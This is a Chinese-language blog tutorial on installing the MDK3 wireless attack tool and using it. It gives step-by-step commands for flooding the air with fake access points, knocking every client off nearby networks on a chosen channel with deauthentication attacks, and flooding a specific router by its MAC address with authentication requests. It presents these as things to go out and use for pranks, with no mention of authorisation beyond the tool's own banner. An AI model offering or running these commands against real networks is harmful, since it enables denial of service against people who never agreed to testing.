MDK3是?
MDK3 是一款無線DOS 攻擊測試工具,能夠發起Beacon Flood、Authentication DoS、Deauthentication/Disassociation Amok 等模式的攻擊,另外它還具有針對隱藏ESSID 的暴力探測模式、802.1X 滲透測試等功能
安裝MDK3
打開文件 /etc/apt/sources.list ,添加kali源:
sudo gedit /etc/apt/sources.list
ubuntu系統安裝MDK3需要kali的源, 我們在文件末尾添加 源:
deb http://mirrors.aliyun.com/kali sana main non-free contrib deb http://mirrors.aliyun.com/kali-security/ sana/updates main contrib non-free deb-src http://mirrors.aliyun.com/kali-security/ sana/updates main contrib non-free
再執行命令安裝:
sudo apt-get install mdk3
如果mdk3創建成功了, 在命令行輸入 sudo mdk3 ,會出現一下提示:
MDK 3.0 v6 - "Yeah, well, whatever" by ASPj of k2wrlz, using the osdep library from aircrack-ng And with lots of help from the great aircrack-ng community: Antragon, moongray, Ace, Zero_Chaos, Hirte, thefkboss, ducttape, telek0miker, Le_Vert, sorbo, Andy Green, bahathir and Dawid Gajownik THANK YOU! MDK is a proof-of-concept tool to exploit common IEEE 802.11 protocol weaknesses. IMPORTANT: It is your responsibility to make sure you have permission from the network owner before running MDK against it. This code is licenced under the GPLv2 MDK USAGE: mdk3 <interface> <test_mode> [test_options] Try mdk3 --fullhelp for all test options Try mdk3 --help <test_mode> for info about one test only TEST MODES: b - Beacon Flood Mode Sends beacon frames to show fake APs at clients. This can sometimes crash network scanners and even drivers! a - Authentication DoS mode Sends authentication frames to all APs found in range. Too much clients freeze or reset some APs. p - Basic probing and ESSID Bruteforce mode Probes AP and check for answer, useful for checking if SSID has been correctly decloaked or if AP is in your adaptors sending range SSID Bruteforcing is also possible with this test mode. d - Deauthentication / Disassociation Amok Mode Kicks everybody found from AP m - Michael shutdown exploitation (TKIP) Cancels all traffic continuously x - 802.1X tests w - WIDS/WIPS Confusion Confuse/Abuse Intrusion Detection and Prevention Systems f - MAC filter bruteforce mode This test uses a list of known client MAC Adresses and tries to authenticate them to the given AP while dynamically changing its response timeout for best performance. It currently works only on APs who deny an open authentication request properly g - WPA Downgrade test deauthenticates Stations and APs sending WPA encrypted packets. With this test you can check if the sysadmin will try setting his network to WEP or disable encryption.
使用MDK3創建偽熱點AP
把網卡 wlx001d0f04f093 設定為混雜模式, 網卡名字是參考ifconfig, 因為沒一臺計算機網卡都不同 :
sudo airmon-ng start wlx001d0f04f093
執行這個最最要的命令, 創建一個名字為:測試模擬WIFI 的 熱點:
sudo mdk3 mon0 b -n 測試WIFI -t -c 6 -s 80
創建一堆偽熱點AP, 首先需要一個文件, 文件里面保存了所有的WIIF名, 比如文件名為wifis.txt , 內容為:
白日依山盡
黃河入海流
欲窮千里目
更上一層樓
如果前面已經執行 sudo airmon-ng start wlx001d0f04f093 ,那就不要再執行,否者務必重新執行一遍 ,然后構造mdk3的命令:
sudo mdk3 mon0 b -f ./wifis.txt -t -c 6
然后就可以出去惡搞啦, 弄一堆WIFI騙人, 雖然這個沒啥用處 >.<
攻擊WIIF熱點, 解除驗證攻擊
Deauthentication/Disassociation Amok 解除驗證攻擊, 在這個模式下,軟件會向周圍所有可見AP發起循環攻擊......可以造成一定范圍內的無線網絡癱瘓
首先通過sudo airodump-ng mon0獲取要攻擊的信道:
sudo airodump-ng mon0
如果要攻擊信道為11的路由, 構造的命令如下:
sudo mdk3 mon0 d -c 11
解除驗證攻擊也可以設置白名單和黑名單, 讓指定的AP不受該攻擊的影響, 具體可以參考幫助文檔:
sudo mdk3 --help d
Authentication DoS
Authentication DoS,這是一種驗證請求攻擊模式:在這個模式里,軟件自動模擬隨機產生的mac向目標AP發起大量驗證請求,可以導致AP忙于處理過多的請求而停止對正常連接客戶端的響應, 如果路由不死的話,其實客戶上網也是非常卡的, 親身經歷..
-a后面的參數為 目標AP的MAC地址:
sudo mdk3 mon0 a -a 5C:63:BF:C4:A4:CE
參考
MDK3GITHUB: https://github.com/wi-fi-analyzer/mdk3-master
無線攻擊神器--MDK3 使用方法:http://ju.outofmemory.cn/entry/148457
作者: NONO
出處:http://www.cnblogs.com/diligenceday/
企業網站:http://www.idrwl.com/
開源博客:http://www.github.com/sqqihao
QQ:287101329
微信:18101055830
文章列表